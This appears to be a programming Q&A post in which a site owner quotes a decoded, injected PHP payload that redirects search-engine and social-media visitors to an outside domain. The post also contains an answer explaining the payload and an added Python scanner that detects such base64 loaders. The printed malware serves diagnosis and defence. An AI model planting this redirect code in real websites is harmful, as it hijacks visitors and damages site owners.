
How much have I lost from this malicious code?

Tags: php, malware

This February 14 my website was attacked by some malware code, which came to my notice after Google's action on 29th Feb. All PHP files have been affected by the malicious code. On checking, I found the following code:

echo base64_decode("...");

On decoding, it becomes:

error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
    $referer = $_SERVER['HTTP_REFERER'];
    $uag = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer, "yahoo")
            or stristr($referer, "bing")
            or stristr($referer, "rambler")
            or stristr($referer, "gogo")
            or stristr($referer, "live.com")
            or stristr($referer, "aport")
            or stristr($referer, "nigma")
            or stristr($referer, "webalta")
            or stristr($referer, "begun.ru")
            or stristr($referer, "stumbleupon.com")
            or stristr($referer, "bit.ly")
            or stristr($referer, "tinyurl.com")
            or preg_match("/yandex.ru/yandsearch\?(.*?)\&lr\=/", $referer)
            or preg_match("/google.(.*?)/url/", $referer)
            or stristr($referer, "myspace.com")
            or stristr($referer, "facebook.com")
            or stristr($referer, "aol.com")) {
            if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                header("Location: http://namesti.bee.pl/");
                exit();
            }
        }
    }
}

I don't know how it came to my server, but all PHP files have been affected while others are fine. The entire website is down now. I just want to know how much harm it can do and what this code does exactly. How can I detect it? Is it a script which executes at a particular time?

Sumant asked Mar 11 '26 14:03


1 Answer

The script just attempts to redirect to namesti.bee.pl depending on whether headers have already been sent or not, and what the referer string contains.

It doesn't do anything else, so the harm done is on your site's reputation more than anything else.

Mat answered Mar 14 '26 03:03
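
For the "how can I detect it" part of the question, here is an added example (not code from the question or the answer): a Python scanner that finds `base64_decode` loaders in PHP files, decodes them, and reports the traits of the payload shown above. The `eval` wrapper, the 40-character minimum, the function names and the `redirect.example` sample are assumptions made for illustration.

```python
import base64, binascii, re
from pathlib import Path

# Wrapper seen in the question: echo base64_decode("..."). eval(...) is an
# added assumption; 40+ characters skips short, ordinary base64 literals.
WRAPPER = re.compile(
    r"""\b(?:echo|eval)\s*\(?\s*base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=\s]{40,})\1""",
    re.IGNORECASE)
# Traits of the decoded payload quoted in the question.
TRAITS = {
    "reads_referer": re.compile(r"HTTP_REFERER"),
    "redirects": re.compile(r"header\s*\(\s*[\"']Location:", re.I),
    "hides_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

def inspect_source(text):
    """Return one finding per embedded base64 payload in PHP source text."""
    findings = []
    for m in WRAPPER.finditer(text):
        blob = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # literal is not valid base64, so not a loader
        target = re.search(r"Location:\s*([^\s\"']+)", decoded)
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "traits": sorted(n for n, rx in TRAITS.items() if rx.search(decoded)),
            "redirect_target": target.group(1) if target else None,
        })
    return findings

def scan_tree(root):
    """Scan every *.php file under root; return {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = inspect_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

def build_sample():
    """Constructed sample: one injected loader line followed by a clean line."""
    payload = ('error_reporting(0); if (stristr($_SERVER["HTTP_REFERER"], "bing")) '
               '{ header("Location: http://redirect.example/"); exit(); }')
    blob = base64.b64encode(payload.encode()).decode()
    return '<?php\necho base64_decode("%s");\necho "hello";\n' % blob
```

Run `scan_tree()` against the web root and compare every hit with a known-good copy of the file (a backup or version control), since the question reports the same line in all PHP files.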


